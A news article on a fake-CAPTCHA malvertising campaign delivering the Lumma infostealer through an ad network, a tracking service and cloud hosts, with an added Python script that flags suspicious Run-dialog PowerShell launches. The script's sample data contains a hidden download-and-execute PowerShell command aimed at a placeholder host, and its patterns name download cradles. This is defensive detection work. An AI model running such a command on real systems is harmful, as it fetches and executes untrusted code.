Fake CAPTCHAs reaching millions: who’s responsible for malvertising mayhem?


Legitimate publishers are displaying malicious ads. A legitimate ad network is serving them. A legitimate analytics platform is cloaking them. Legitimate cloud providers are hosting malicious websites and actual malware. Legitimate search engines help drive traffic. Everyone is pointing the finger and no one is accountable.

The new malvertising campaign abusing fake captchas to drive infostealer infections has an astonishing reach.

“Over just the past ten days, our analysis estimated up to 1M ‘ad impressions’ per day, arriving from around 3000+ publisher sites,” reads a new report by Guardio Labs.


Cybernews recently reported on threat actors successfully using malicious bot detection prompts to drop the infostealer Lumma. The fake captchas appear unexpectedly as users browse and mimic the real verification process.

They ask users to press three key combinations, which secretly copy-paste a malicious PowerShell command from the clipboard to the system’s Run window and execute it.
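The hands-on step described above (a command pasted into the Run dialog and launched from there) leaves a recognisable trace in endpoint telemetry: a script host started by the interactive shell, with command-line flags that a person typing by hand rarely needs. The Python below is an added example, not code from Cybernews or Guardio Labs. It scores constructed process-creation records modelled on Sysmon Event ID 1 fields; the command lines, user names and the domain example.invalid are invented for illustration, and the weights and threshold are assumptions to be tuned against real baselines.

```python
import ntpath
import re

# Constructed sample events in the style of Sysmon Event ID 1 (process creation).
# These are not real telemetry from the campaign; field names mirror Sysmon's.
SAMPLE_EVENTS = [
    {   # benign: a user opens a console from the Start menu
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"',
        "User": "CORP\\alice",
    },
    {   # suspicious: hidden PowerShell launched from the Run dialog with a download cradle
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/x)"',
        "User": "CORP\\bob",
    },
    {   # benign: a scheduled task runs a maintenance script under SYSTEM
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -File C:\Scripts\cleanup.ps1",
        "User": "NT AUTHORITY\\SYSTEM",
    },
]

# Script hosts worth scoring; anything else returns a score of 0.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}

# explorer.exe is the parent of anything started from the Run dialog or Start menu.
INTERACTIVE_PARENTS = {"explorer.exe"}

# (weight, description, pattern) matched against the command line, case-insensitively.
# Weights are an assumption for this example, not a published detection rule.
INDICATORS = [
    (1, "hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    (1, "execution policy bypass", re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I)),
    (1, "profile suppressed", re.compile(r"-nop(?:rofile)?\b", re.I)),
    (2, "download cradle", re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|net\.webclient)\b", re.I)),
    (2, "in-memory execution", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    (1, "remote URL", re.compile(r"https?://", re.I)),
    (2, "encoded command", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
]

ALERT_THRESHOLD = 4  # assumed; tune against a baseline of legitimate interactive launches


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path, portable to non-Windows hosts."""
    return ntpath.basename(path).lower()


def score_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation record."""
    if _basename(event.get("Image", "")) not in SCRIPT_HOSTS:
        return 0, []
    score, reasons = 0, []
    if _basename(event.get("ParentImage", "")) in INTERACTIVE_PARENTS:
        score += 1
        reasons.append("launched from interactive shell (Run dialog / Start menu)")
    cmd = event.get("CommandLine", "")
    for weight, description, pattern in INDICATORS:
        if pattern.search(cmd):
            score += weight
            reasons.append(description)
    return score, reasons


def triage_events(events: list[dict], threshold: int = ALERT_THRESHOLD) -> list[dict]:
    """Return the records whose score reaches the threshold, with their reasons attached."""
    findings = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            findings.append({**event, "score": score, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in triage_events(SAMPLE_EVENTS):
        print(f"{hit['User']}: score {hit['score']} -> {', '.join(hit['reasons'])}")
        print(f"  {hit['CommandLine']}")
```

The parent-process signal on its own is noisy (the first sample is a legitimate console launch and scores only 1), which is why it is combined with the command-line indicators; a bare console opened from the Start menu never reaches the threshold, while a hidden, policy-bypassing download cradle does. On a real estate the same logic would run over Sysmon or Windows 4688 events with command-line auditing enabled, and the RunMRU history under HKCU can corroborate that the command was typed into the Run dialog.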

The less clear part was how the threat actors actually delivered such popups to unsuspecting users.

“This initial deceit is just the surface,” Guardio Labs said.

The success of the campaign lies in the sophisticated exploitation of underlying mechanics of advertising networks to deliver “malvertising on steroids.”

Ad networks enable the delivery of powerful malware

Threat actors often abuse ad networks, as they are essential links to distribute traffic from publishers’ websites to advertisers' landing pages. Even Facebook ads or Google’s Search sponsored results aren’t immune to malvertising.

“Ad networks have proven exceptionally successful; they are fine-tuned machines built from the ground up to distribute traffic on a massive scale,” Guardio Labs explains in the new report.


After dissecting the fake captcha campaign, the researchers discovered that it is entirely based on malvertising originating from a single ad network service, Monetag. Monetag is a subsidiary of PropellerAds, a large ad network company based in Cyprus, which had previously been caught peddling ads that urge users to scan their computers or update software.

For advertisers, creating a Monetag account is straightforward. The firm provides script tags, popup tabs, banners, push notifications, and other tools to run ads.

However, the researchers claim that provided scripts perform extensive fingerprinting, inject tracking cookies, scan the website content, and “essentially ‘hijack’ the site, capturing clicks to spawn new ad tabs, soliciting notification permissions, and even deploying pop-over iframes.”

The malicious ads were delivered to a “plethora of websites,” which were often linked to the piracy of movies or live sports streams and even direct links on social media. Due to aggressive search engine optimization, some of these websites appeared on top of Google Search results.

[Image: Monetag involvement]

“We identified approximately 3,000 publisher sites actively using Monetag ad-zone scripts in the last ten days. These scripts track visitors and trigger intrusive actions such as push notifications and new tab pop-ups. For instance, the anime site ‘hianime[.]to’ alone garnered over 100k+ unique visits last month.”

The malicious ads did not lead directly to the malicious websites; another service was used for cloaking. The threat actors abused the BeMob ad tracking service.

“By supplying a benign BeMob URL to Monetag’s ad management system instead of the direct fake captcha page, the attackers leveraged BeMob’s reputation, complicating Monetag's content moderation efforts,” the researchers explain.

The malicious captcha pages themselves were hosted on services like Oracle Cloud, Scaleway, Bunny CDN, EXOScale, and even Cloudflare.

In one example, the researchers showed a Cloudflare-themed fake captcha page hosted on Cloudflare R2 storage.

[Image: Cloudflare involvement]

“As we delve deeper into the distribution method known as malvertising, it becomes clear how intricate and complicated the fake captcha campaign truly is. Yet, the core operations heavily rely on the ad network – essentially, their standard business practice is transformed for malicious use,” the report explains.

No one is fully accountable

While a single ad click sets off a chain reaction involving multiple service providers, domains, servers, and stakeholders, each of them has a convenient excuse.

The ad network won’t moderate the creative content because it’s cloaked behind an ad statistics service. The ad tracking service argues that it’s merely an analytics tool. The publishers distance themselves, saying they’re merely monetizing their websites via third-party services. Hosting providers, for their part, are largely unaware of what they host.


“This fragmented chain of ownership creates a perfect storm of plausible deniability, making it exceptionally difficult to pinpoint and enforce accountability. It’s a system designed to shift blame while allowing malicious campaigns to thrive,” Guardio Labs said.

The researchers responsibly disclosed their findings to the companies involved, and Monetag swiftly banned over 200 accounts linked to the abuse. The actions significantly reduced the fake captcha page views. However, the impressions started to pick up again after more than a week.

[Image: fake captcha traffic over time]

The researchers warn that this is just a single example exposing the “darker side of the internet’s advertising ecosystem.” Advertising has become a cornerstone of the modern internet, but the profit-driven ecosystem faces a significant conflict of interest and leaves users vulnerable.


“The takeaway is simple: be cautious of websites offering FREE content you would otherwise pay for. As we always say – there’s no such thing as a free gift on the internet,” the researchers concluded.